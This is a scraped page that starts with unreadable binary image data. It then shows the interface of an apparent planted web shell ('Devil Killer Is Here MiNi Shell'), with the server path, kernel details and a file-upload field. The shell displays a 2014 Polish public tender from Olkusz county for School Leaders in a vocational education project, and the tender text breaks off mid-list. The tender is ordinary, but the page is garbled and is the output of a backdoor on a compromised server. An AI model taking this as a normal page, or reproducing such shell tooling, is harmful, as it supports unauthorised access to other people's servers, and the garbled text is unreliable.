JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140902/187231-N-2014.html

<p class="kh_header"><b>Olkusz: Pełnienie funkcji Lidera Szkolnego w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce w Zespołach Szkół Ponadgimnazjalnych Powiatu Olkuskiego</b><br>
<b>Numer ogłoszenia: 187231 - 2014; data zamieszczenia: 02.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Olkuszu , ul. Mickiewicza 2, 32-300 Olkusz, woj. małopolskie, tel. 032 6430414, 6476670, faks 032 6430490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp.olkusz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Lidera Szkolnego w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce w Zespołach Szkół Ponadgimnazjalnych Powiatu Olkuskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji Lidera Szkolnego w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce w zespołach szkół z terenu Powiatu Olkuskiego:
Część I - Lider Szkolny w Zespole Szkół nr 1 w Olkuszu
Część II - Lider Szkolny w Zespole Szkół nr 3 w Olkuszu
Część III - Lider Szkolny w Zespole Szkół nr 4 w Olkuszu
Część IV - Lider Szkolny w Zespole Szkół w Bukownie.
Zamawiający dopuszcza składanie ofert częściowych na jedną lub więcej z 4 części zamówienia wykazanych powyżej.
Do obowiązków Lidera Szkolnego należeć będzie:
1.Wdrożenie we współpracy ze społecznością szkolną Programu Rozwoju Szkoły w zakresie objętym problematyką projektu.
2.Współpraca z gronem pedagogicznym i rodzicami uczniów objętym wsparciem w obszarze prawidłowej realizacji działań wynikających z Programu Rozwoju Szkoły, jego założeń, statutu i misji szkoły.
3.Nadzór nad prawidłową realizacją Programu Rozwoju Szkoły w zakresie objętym projektem.
4.Nadzór nad prawidłowym dokumentowaniem realizacji projektu w szkole.
5.Współpraca w zakresie zamówień publicznych przeprowadzonych w ramach projektu m.in. przygotowywanie opisu przedmiotu zamówienia
6.Stała współpraca z koordynatorem ds. realizacji projektu w zakresie realizacji projektu.
7.Monitorowanie realizacji założonych rezultatów zgodnie z wnioskiem o dofinansowanie.
8.Opracowanie harmonogramów zajęć wyrównawczych i szkoleń branżowych w ramach projektu.
9.Nadzór nad procesem rekrutacji uczniów do projektu w szkołach oraz pomoc uczniom w wypełnianiu dokumentacji rekrutacyjnej.
10.Współpraca przy opracowywaniu procedur związanych z realizacją projektu m.in. regulaminów rekrutacji, programu i harmonogramów zajęć wyrównawczych, zajęć rozwijających kompetencje kluczowe, kursów i szkoleń branżowych w ramach projektu oraz staży-wizyt zawodoznawczych.
11.Nadzór nad prawidłowym oznaczeniem materiałów promocyjnych, edukacyjnych, informacyjnych, szkoleniowych oraz oznaczeniem szkoły, sal i sprzętów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
12.Przekazywanie do koordynatora ds. realizacji projektu niezbędnych informacji i wyjaśnień związanych z realizacją projektu.
13.Zarządzanie danymi osobowymi osób uczestniczących w projekcie realizowanym w szkole zgodnie z ustawą o ochronie danych osobowych.
14.Zapewnienie warunków sprawnego przeprowadzenia kontroli w zakresie prawidłowej realizacji projektu prowadzonej przez Biuro Realizatora Projektu, Biuro Lidera oraz przez instytucje uprawnione do przeprowadzenia kontroli realizacji projektu na terenie szkoły i warsztatów szkolnych.
15.Udostępnianie każdorazowo na wniosek koordynatora ds. realizacji projektu lub uprawnionych podmiotów dokumentów lub informacji umożliwiających dokonanie oceny wpływu realizowanych zadań w odniesieniu do celów Projektu i celów Programu Operacyjnego Kapitał Ludzki.
16.Współpraca z Biurem Realizatora Projektu oraz komunikowanie się w ramach realizacji projektu w uzgodniony sposób.
17.Uczestnictwo w spotkaniach z przedstawicielami Biura Realizatora Projektu i Lidera Projektu.
18.Niezwłoczne informowanie koordynatora ds. realizacji projektu o okolicznościach, których zaistnienie uzasadniałoby wprowadzenie zmian w realizacji zadań projektu oraz o ewentualnych przeszkodach przy realizacji zadań, w tym o ryzyku zaprzestania realizacji zadań. Reagowanie na wystąpienie nieprzewidzianych problemów, podejmowanie działań naprawczych.
19.Promowanie projektu na radach pedagogicznych, informowanie społeczności lokalnej, uczniów oraz ich rodziców o postępie rzeczowym w ramach prowadzonych form wsparcia oraz o źródłach finansowania projektu. Stosowanie materiałów informacyjnych i wzorów dokumentów przekazanych przez Lidera Partnerstwa i Biuro Realizatora Projektu.
20.Nadzorowanie jakości zajęć pozalekcyjnych i kursów oraz staży-wizyt zawodoznawczych m. in. przez niezapowiedziane wizyty w trakcie trwania zajęć
21.Współpraca z koordynatorem ds. realizacji projektu w zakresie przeprowadzania ewaluacji realizowanych w szkole zajęć.
22.Wykonywanie innych zadań wynikających z umowy oraz z innych dokumentów i zleceń związanych z realizacją projektu, w celu zapewnienia sprawnej realizacji, promocji i rozliczania projektu.
Wymagania dodatkowe osoby która będzie pełnić  funkcję lidera szkolnego
a)znajomość planów lekcji zajęć szkolnych uczniów,
b)możliwość kontaktu z uczniami oraz nauczycielami w czasie trwania zajęć lekcyjnych oraz realizowanych w ramach projektu (być dyspozycyjnym w tym czasie)
c)znajomość statutu szkoły,
d)umiejętność porozumiewania się z prowadzącymi zajęcia,
e)umiejętność koordynowania zajęć dodatkowych, pozalekcyjnych z zajęciami realizowanymi w ramach programu nauczania,
f)znajomość merytoryczna i organizacyjna pracy szkół ponadgimnazjalnych w tym kształcenia zawodowego
g)znajomość zaplecza dydaktycznego szkoły uczestniczącej w projekcie
h)znajomość przepisów z zakresu: ustawy o finansach publicznych, ustawy prawo zamówień publicznych, ustawy o ochronie danych osobowych oraz przepisów prawa oświatowego
i)znajomość przepisów i dokumentów związanych z realizacją projektów w ramach Programu Operacyjnego Kapitał Ludzki w okresie 2007-2013, 
j)znajomość założeń projektu pn. Modernizacja kształcenia zawodowego w Małopolsce, umiejętność pracy w zespole,
k)odpowiedzialność, sumienność, rzetelność, skrupulatność, terminowość wykonywania zadań,
l)wysoka kultura osobista oraz łatwość nawiązywania kontaktów interpersonalnych,
m)dyspozycyjność pracy w soboty i niedziele,
n)mobilność w poruszaniu się w obrębie powiatu
Zamawiający nie będzie dokonywał zakupów sprzętu komputerowego oraz biurowego na rzecz osób pełniących funkcję Lidera Szkolnego. W związku z powyższym Lider Szkolny musi posiadać własny sprzęt tj. co najmniej komputer, telefon oraz drukarkę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2 do SIWZ.W szczególności zamawiający wymaga dysponowania co najmniej  jedną osobą (na każdą z części zamówienia) spełniającą warunki:-wykształcenie wyższe pedagogiczne lub wyższe magisterskie z przygotowaniem pedagogicznym,
-czynna praca zawodowa w szkolnictwie na poziomie ponadgimnazjalnym,
-znajomość problematyki kształcenia zawodowego popartą min. 5-letnim doświadczeniem,
-znajomość obsługi pakietu MS Office,
-doświadczenie w pracy przy realizacji projektów edukacyjnych finansowanych ze środków UE, w szczególności doświadczenie w zarządzaniu projektem bądź organizacją wsparcia w ramach projektu
 (UWAGA: Jeżeli wykonawca składa ofertę na więcej niż jedną część zamówienia, winien  dysponować  odpowiednią liczbą osób tzn. na każdą część co najmniej jedną osobą, np. składając ofertę na wszystkie części zamówienia winien dysponować co najmniej 4 osobami spełniającymi powyższe warunki).Na potwierdzenie tego warunku Wykonawca składa jedynie oświadczenie o spełnianiu warunków udziału w postępowaniu - wg. wzoru z załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp.olkusz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Olkuszu, ul. Mickiewicza 2, 32-300 Olkusz- pokój nr 92..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2014 godzina 09:30, miejsce: Starostwo Powiatowe w Olkuszu, ul. Mickiewicza 2, 32-300 Olkusz- pokój nr 27 (Kancelaria Ogólna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Modernizacja kształcenia zawodowego w Małopolsce współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Lider Szkolny w Zespole Szkół nr 1 w Olkuszu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do obowiązków Lidera Szkolnego należeć będzie:
1.	Wdrożenie we współpracy ze społecznością szkolną Programu Rozwoju Szkoły w zakresie objętym problematyką projektu.
2.	Współpraca z gronem pedagogicznym i rodzicami uczniów objętym wsparciem w obszarze prawidłowej realizacji działań wynikających z Programu Rozwoju Szkoły, jego założeń, statutu i misji szkoły.
3.	Nadzór nad prawidłową realizacją Programu Rozwoju Szkoły w zakresie objętym projektem.
4.	Nadzór nad prawidłowym dokumentowaniem realizacji projektu w szkole.
5.	Współpraca w zakresie zamówień publicznych przeprowadzonych w ramach projektu m.in. przygotowywanie opisu przedmiotu zamówienia
6.	Stała współpraca z koordynatorem ds. realizacji projektu w zakresie realizacji projektu.
7.	Monitorowanie realizacji założonych rezultatów zgodnie z wnioskiem o dofinansowanie.
8.	Opracowanie harmonogramów zajęć wyrównawczych i szkoleń branżowych w ramach projektu.
9.	Nadzór nad procesem rekrutacji uczniów do projektu w szkołach oraz pomoc uczniom w wypełnianiu dokumentacji rekrutacyjnej.
10.	Współpraca przy opracowywaniu procedur związanych z realizacją projektu m.in. regulaminów rekrutacji, programu i harmonogramów zajęć wyrównawczych, zajęć rozwijających kompetencje kluczowe, kursów i szkoleń branżowych w ramach projektu oraz staży-wizyt zawodoznawczych.
11.	Nadzór nad prawidłowym oznaczeniem materiałów promocyjnych, edukacyjnych, informacyjnych, szkoleniowych oraz oznaczeniem szkoły, sal i sprzętów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
12.	Przekazywanie do koordynatora ds. realizacji projektu niezbędnych informacji i wyjaśnień związanych z realizacją projektu.
13.	Zarządzanie danymi osobowymi osób uczestniczących w projekcie realizowanym w szkole zgodnie z ustawą o ochronie danych osobowych.
14.	Zapewnienie warunków sprawnego przeprowadzenia kontroli w zakresie prawidłowej realizacji projektu prowadzonej przez Biuro Realizatora Projektu, Biuro Lidera oraz przez instytucje uprawnione do przeprowadzenia kontroli realizacji projektu na terenie szkoły i warsztatów szkolnych.
15.	Udostępnianie każdorazowo na wniosek koordynatora ds. realizacji projektu lub uprawnionych podmiotów dokumentów lub informacji umożliwiających dokonanie oceny wpływu realizowanych zadań w odniesieniu do celów Projektu i celów Programu Operacyjnego Kapitał Ludzki.
16.	Współpraca z Biurem Realizatora Projektu oraz komunikowanie się w ramach realizacji projektu w uzgodniony sposób.
17.	Uczestnictwo w spotkaniach z przedstawicielami Biura Realizatora Projektu i Lidera Projektu.
18.	Niezwłoczne informowanie koordynatora ds. realizacji projektu o okolicznościach, których zaistnienie uzasadniałoby wprowadzenie zmian w realizacji zadań projektu oraz o ewentualnych przeszkodach przy realizacji zadań, w tym o ryzyku zaprzestania realizacji zadań. Reagowanie na wystąpienie nieprzewidzianych problemów, podejmowanie działań naprawczych.
19.	Promowanie projektu na radach pedagogicznych, informowanie społeczności lokalnej, uczniów oraz ich rodziców o postępie rzeczowym w ramach prowadzonych form wsparcia oraz o źródłach finansowania projektu. Stosowanie materiałów informacyjnych i wzorów dokumentów przekazanych przez Lidera Partnerstwa i Biuro Realizatora Projektu.
20.	Nadzorowanie jakości zajęć pozalekcyjnych i kursów oraz staży-wizyt zawodoznawczych m. in. przez niezapowiedziane wizyty w trakcie trwania zajęć
21.	Współpraca z koordynatorem ds. realizacji projektu w zakresie przeprowadzania ewaluacji realizowanych w szkole zajęć.
22.	Wykonywanie innych zadań wynikających z umowy oraz z innych dokumentów i zleceń związanych z realizacją projektu, w celu zapewnienia sprawnej realizacji, promocji i rozliczania projektu.
Wymagania dodatkowe osoby która będzie pełnić  funkcję lidera szkolnego
a)	znajomość planów lekcji zajęć szkolnych uczniów,
b)	możliwość kontaktu z uczniami oraz nauczycielami w czasie trwania zajęć lekcyjnych oraz realizowanych w ramach projektu (być dyspozycyjnym w tym czasie)
c)	znajomość statutu szkoły,
d)	umiejętność porozumiewania się z prowadzącymi zajęcia,
e)	umiejętność koordynowania zajęć dodatkowych, pozalekcyjnych z zajęciami realizowanymi w ramach programu nauczania,
f)	znajomość merytoryczna i organizacyjna pracy szkół ponadgimnazjalnych w tym kształcenia zawodowego
g)	znajomość zaplecza dydaktycznego szkoły uczestniczącej w projekcie
h)	znajomość przepisów z zakresu: ustawy o finansach publicznych, ustawy prawo zamówień publicznych, ustawy o ochronie danych osobowych oraz przepisów prawa oświatowego
i)	znajomość przepisów i dokumentów związanych z realizacją projektów w ramach Programu Operacyjnego Kapitał Ludzki w okresie 2007-2013, 
j)	znajomość założeń projektu pn. Modernizacja kształcenia zawodowego w Małopolsce, umiejętność pracy w zespole,
k)	odpowiedzialność, sumienność, rzetelność, skrupulatność, terminowość wykonywania zadań,
l)	wysoka kultura osobista oraz łatwość nawiązywania kontaktów interpersonalnych,
m)	dyspozycyjność pracy w soboty i niedziele,
n)	mobilność w poruszaniu się w obrębie powiatu
Zamawiający nie będzie dokonywał zakupów sprzętu komputerowego oraz biurowego na rzecz osób pełniących funkcję Lidera Szkolnego. W związku z powyższym Lider Szkolny musi posiadać własny sprzęt tj. co najmniej komputer, telefon oraz drukarkę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Lider Szkolny w Zespole Szkół nr 3 w Olkuszu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do obowiązków Lidera Szkolnego należeć będzie:
1.	Wdrożenie we współpracy ze społecznością szkolną Programu Rozwoju Szkoły w zakresie objętym problematyką projektu.
2.	Współpraca z gronem pedagogicznym i rodzicami uczniów objętym wsparciem w obszarze prawidłowej realizacji działań wynikających z Programu Rozwoju Szkoły, jego założeń, statutu i misji szkoły.
3.	Nadzór nad prawidłową realizacją Programu Rozwoju Szkoły w zakresie objętym projektem.
4.	Nadzór nad prawidłowym dokumentowaniem realizacji projektu w szkole.
5.	Współpraca w zakresie zamówień publicznych przeprowadzonych w ramach projektu m.in. przygotowywanie opisu przedmiotu zamówienia
6.	Stała współpraca z koordynatorem ds. realizacji projektu w zakresie realizacji projektu.
7.	Monitorowanie realizacji założonych rezultatów zgodnie z wnioskiem o dofinansowanie.
8.	Opracowanie harmonogramów zajęć wyrównawczych i szkoleń branżowych w ramach projektu.
9.	Nadzór nad procesem rekrutacji uczniów do projektu w szkołach oraz pomoc uczniom w wypełnianiu dokumentacji rekrutacyjnej.
10.	Współpraca przy opracowywaniu procedur związanych z realizacją projektu m.in. regulaminów rekrutacji, programu i harmonogramów zajęć wyrównawczych, zajęć rozwijających kompetencje kluczowe, kursów i szkoleń branżowych w ramach projektu oraz staży-wizyt zawodoznawczych.
11.	Nadzór nad prawidłowym oznaczeniem materiałów promocyjnych, edukacyjnych, informacyjnych, szkoleniowych oraz oznaczeniem szkoły, sal i sprzętów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
12.	Przekazywanie do koordynatora ds. realizacji projektu niezbędnych informacji i wyjaśnień związanych z realizacją projektu.
13.	Zarządzanie danymi osobowymi osób uczestniczących w projekcie realizowanym w szkole zgodnie z ustawą o ochronie danych osobowych.
14.	Zapewnienie warunków sprawnego przeprowadzenia kontroli w zakresie prawidłowej realizacji projektu prowadzonej przez Biuro Realizatora Projektu, Biuro Lidera oraz przez instytucje uprawnione do przeprowadzenia kontroli realizacji projektu na terenie szkoły i warsztatów szkolnych.
15.	Udostępnianie każdorazowo na wniosek koordynatora ds. realizacji projektu lub uprawnionych podmiotów dokumentów lub informacji umożliwiających dokonanie oceny wpływu realizowanych zadań w odniesieniu do celów Projektu i celów Programu Operacyjnego Kapitał Ludzki.
16.	Współpraca z Biurem Realizatora Projektu oraz komunikowanie się w ramach realizacji projektu w uzgodniony sposób.
17.	Uczestnictwo w spotkaniach z przedstawicielami Biura Realizatora Projektu i Lidera Projektu.
